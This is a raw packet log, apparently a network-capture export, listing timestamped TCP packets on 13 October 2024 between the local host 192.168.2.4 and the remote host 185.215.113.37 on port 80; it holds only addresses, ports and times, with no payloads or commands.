Oct 13, 2024 17:46:16.061532021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.066333055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.292335033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.292366982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.292386055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.292401075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.292414904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.292424917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.292439938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.292462111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.292468071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.292484999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.292499065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.292510033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.292514086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.292530060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.292531967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.292550087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.292567015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.292598963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.406555891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.406574965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.406589985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.406604052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.406619072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.406632900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.406647921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.406666040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.406681061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.406691074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.406696081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.406738043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.406781912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.406795979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.406810045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.406824112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.406840086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.406861067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.406929016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.406943083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.406956911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.406965971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.406971931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.406986952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.406991959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.407001972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.407016039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.407021046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.407037020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.407042027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.407052994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.407066107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.407071114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.407098055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.531013966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.531065941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.531152010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.531177998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.531193018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.531199932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.531234026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.531316042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.531326056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.531363010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.531378984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.531430960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.531452894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.531501055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.531506062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.531541109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.531554937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.531580925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.531586885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.531622887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.531661034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.531709909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.531728983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.531774044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.531776905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.531812906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.531831980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.531857014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.531877041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.531914949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.531934023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.531958103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.531977892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532011032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532020092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532048941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532053947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532089949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532097101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532124996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532154083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532156944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532172918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532191992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532195091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532224894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532233953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532259941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532279015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532290936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532305956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532324076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532331944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532357931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532366037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532392025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532399893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532424927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532434940 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532459021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532488108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532490969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532505989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532526016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532536030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532557964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532569885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532592058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532597065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532624960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532634020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532659054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532666922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532696009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532701015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532730103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532746077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532763004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532794952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532795906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532816887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532828093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532838106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532861948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532871008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532893896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532907009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532928944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532942057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532963037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.532974958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532999039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.532999992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.533036947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.533104897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.533139944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.533148050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.533178091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656014919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656032085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656049967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656063080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656073093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656085014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656095028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656100988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656105995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656116962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656133890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656140089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656147003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656157970 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656158924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656168938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656174898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656189919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656200886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656200886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656212091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656223059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656233072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656236887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656246901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656259060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656263113 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656270981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656284094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656308889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656312943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656330109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656342030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656351089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656352043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656363010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656373024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656375885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656403065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656414032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656416893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656425953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656436920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656440973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656467915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656493902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656497955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656511068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656522036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656529903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656533003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656555891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656579971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656634092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656644106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656653881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656671047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656671047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656687975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656692982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656701088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656711102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656718016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656728029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656739950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656749010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656749964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656765938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656779051 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656800032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656824112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656867027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656877041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656888008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656898975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656908989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656922102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656928062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656939983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656944990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656949043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.656958103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656969070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656980038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.656980038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.657001019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.657025099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.657067060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657078028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657088041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657109022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.657130003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.657140017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657150030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657160997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657171965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657182932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.657200098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657210112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657215118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.657222033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657239914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657242060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.657253027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657263041 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.657263994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657274961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657299042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.657320023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.657393932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657404900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657423019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657428026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.657433987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657448053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657459974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.657505035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.657527924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657540083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657551050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657562971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657577038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.657601118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657607079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.657638073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657648087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657658100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657670975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.657675982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657686949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657690048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.657699108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657708883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657720089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657721043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.657742023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.657749891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657759905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.657761097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657773018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657787085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.657810926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.657845020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657855988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657866955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657876015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.657876015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.657917976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.780538082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.780605078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.780625105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.780639887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.780668974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.780674934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.780688047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.780714035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.780726910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.780747890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.780761003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.780786991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.780790091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.780817032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.780828953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.780850887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.780863047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.780885935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.780898094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.780919075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.780936003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.780966043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.780971050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.781006098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.781021118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.781039953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.781053066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.781074047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.781088114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.781121016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:16.781126976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.781160116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:16.781173944 CEST	49730	80	192.168.2.4	185.215.113.37
